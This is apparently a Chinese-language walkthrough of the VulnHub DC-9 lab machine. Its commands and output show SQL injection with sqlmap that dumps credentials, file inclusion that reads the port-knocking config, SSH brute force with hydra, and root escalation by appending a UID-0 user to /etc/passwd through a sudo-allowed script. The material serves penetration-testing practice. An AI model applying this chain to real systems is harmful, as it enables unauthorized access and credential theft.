vulnhub-DC-9

信息收集

nmap扫一下

└─# nmap -A -p1-65535 192.168.20.139   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 19:54 CST
Nmap scan report for 192.168.20.139
Host is up (0.0015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:8D:A7:50 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.46 ms 192.168.20.139

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.59 seconds

这次80端口开放，但是22端口没开，可能有什么问题，先看看80端口

sql注入

在search页面很常规的sql注入，直接sqlmap跑

└─# sqlmap -r "ma.txt" --dbs --batch
available databases [3]:
[*] information_schema
[*] Staff
[*] users

先看一下Staff数据库，可以拿到管理员密码

sqlmap -r "ma.txt" -D Staff -T Users -C Username,Password --dump --batch
+----------+----------------------------------+
| Username | Password                         |
+----------+----------------------------------+
| admin    | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+

一眼md5，解密出来是transorbital1，登录后台成功，在Manage页面脚有一个File does not exist的提示，很显然有文件包含，猜测参数为file，果然可以，由于22端口关闭，猜测启用了knock服务，看一下有没有

/addrecord.php?file=../../../../etc/knockd.conf

[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn

果然有，使用暗号（7469,8475,9842）敲门

└─# nc -z 192.168.20.139 7469 8475 9842

└─# nmap -A -p1-65535 192.168.20.139   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 19:55 CST
Nmap scan report for 192.168.20.139
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
|   256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_  256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:8D:A7:50 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.64 ms 192.168.20.139

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.69 seconds

ok，打开了，那么用户名密码呢，还记得数据库中还有个users吗，脱下来

sqlmap -r "ma.txt" -D users -T UserDetails -C username,password --dump --batch

+-----------+---------------+
| username  | password      |
+-----------+---------------+
| marym     | 3kfs86sfd     |
| julied    | 468sfdfsd2    |
| fredf     | 4sfd87sfd1    |
| barneyr   | RocksOff      |
| tomc      | TC&TheBoyz    |
| jerrym    | B8m#48sd      |
| wilmaf    | Pebbles       |
| bettyr    | BamBam01      |
| chandlerb | UrAG0D!       |
| joeyt     | Passw0rd      |
| rachelg   | yN72#dsd      |
| rossg     | ILoveRachel   |
| monicag   | 3248dsds7s    |
| phoebeb   | smellycats    |
| scoots    | YR3BVxxxw87   |
| janitor   | Ilovepeepee   |
| janitor2  | Hawaii-Five-0 |
+-----------+---------------+

用hydra爆一下

└─# hydra -L users.txt -P pass.txt 192.168.20.139 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-26 20:12:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.20.139:22/
[22][ssh] host: 192.168.20.139   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.20.139   login: joeyt   password: Passw0rd
[STATUS] 247.00 tries/min, 247 tries in 00:01h, 45 to do in 00:01h, 13 active
[22][ssh] host: 192.168.20.139   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-26 20:14:02

拿到三个用户，都看了一下，只有janitor用户中存在可疑文件

└─# ssh janitor@192.168.20.139
janitor@192.168.20.139's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
janitor@dc-9:~$ ls
janitor@dc-9:~$ cd /home/janitor
janitor@dc-9:~$ ls
janitor@dc-9:~$ ls -a
.  ..  .bash_history  .gnupg  .secrets-for-putin
janitor@dc-9:~$ car .secrets-for-putin/
-bash: car: command not found
janitor@dc-9:~$ cd  .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

又是密码，写进密码本再爆破，又拿到一个用户

[22][ssh] host: 192.168.20.139   login: fredf   password: B4-Tru3-001

sudo提权

常规操作sudo、suid

fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

看看文件发现是二进制程序，翻找后发现是test.py生成的

fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()

就是将文件1追加写入文件2，那么就可以想到利用这个方法向/etc/passwd中添加root权限的用户

fredf@dc-9:/opt/devstuff$ openssl passwd -1 -salt hsh hsh
$1$hsh$TvjPz1RW6vswLzyLFta1c1
fredf@dc-9:/tmp$ echo 'hsh:$1$hsh$TvjPz1RW6vswLzyLFta1c1:0:0::/root:/bin/bash'>hshdgyq
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test hshdgyq /etc/passwd
Traceback (most recent call last):
  File "test.py", line 10, in <module>
FileNotFoundError: [Errno 2] No such file or directory: 'hshdgyq'
[2699] Failed to execute script test
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/hshdgyq /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash
julied:x:1002:1002:Julie Dooley:/home/julied:/bin/bash
fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash
barneyr:x:1004:1004:Barney Rubble:/home/barneyr:/bin/bash
tomc:x:1005:1005:Tom Cat:/home/tomc:/bin/bash
jerrym:x:1006:1006:Jerry Mouse:/home/jerrym:/bin/bash
wilmaf:x:1007:1007:Wilma Flintstone:/home/wilmaf:/bin/bash
bettyr:x:1008:1008:Betty Rubble:/home/bettyr:/bin/bash
chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash
joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash
rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash
rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash
monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash
phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash
scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash
janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash
janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash
hsh:$1$hsh$TvjPz1RW6vswLzyLFta1c1:0:0::/root:/bin/bash

现在切换用户可以拿到root权限

fredf@dc-9:/opt/devstuff/dist/test$ su hsh
Password: 
root@dc-9:/opt/devstuff/dist/test# whoami
root

至此靶机攻克。vulnhub dc系列也到此为止结束了。

总结

前面很常规，就文件写入这里我对于passwd文件的格式不是太熟悉，详细了解了一下：

hsh:$1$hsh$TvjPz1RW6vswLzyLFta1c1:0:0::/root:/bin/bash

用户名（hsh）
表示该用户的登录名。

密码占位符（$1$hsh$TvjPz1RW6vswLzyLFta1c1）
在现代系统中，这个字段通常是密码的加密哈希值。
$1$ 表示使用 MD5 作为加密算法。
剩下的部分是具体的加密后的密码值。

用户ID（0）
0 是系统管理员（root）的用户ID，拥有系统的最高权限。
组ID（0）
0 表示用户属于 root 组。

用户描述字段（空白）
通常可以用来存储用户的全名或者其他信息，这里为空。

主目录（/root）
指定用户的主目录，/root 是系统管理员的默认主目录。

默认Shell（/bin/bash）
指定用户登录时使用的默认命令解释器（Shell），这里是 Bash Shell。